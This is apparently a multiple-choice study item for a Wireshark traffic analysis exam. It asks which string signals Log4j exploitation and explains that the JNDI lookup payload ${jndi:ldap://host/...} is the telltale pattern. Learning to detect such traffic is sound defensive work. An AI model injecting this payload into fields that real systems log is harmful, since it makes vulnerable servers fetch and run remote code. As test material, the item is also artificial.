Which string is commonly associated with Log4j exploitation patterns?

Prepare for the Wireshark Traffic Analysis Exam. Study with flashcards and multiple choice questions; each question includes hints and explanations. Ace your exam!

Multiple Choice

Which string is commonly associated with Log4j exploitation patterns?

Explanation:
The key idea is that Log4j exploitation relies on a JNDI lookup embedded in what gets logged. A payload like ${jndi:ldap://host/...} triggers the vulnerability by causing the application to fetch and execute code from a remote source when Log4j processes the log message. That JNDI string is the telltale pattern of the Log4j RCE attack, which is why it’s the correct choice.

The other options don’t carry that JNDI-based payload. A normal browser user-agent string is benign in this context, TLS is just a security protocol for encryption and doesn’t itself enable code execution, and ${sys:*/..} resembles a different kind of substitution but isn’t the well-known JNDI-based exploit pattern used in Log4j attacks.
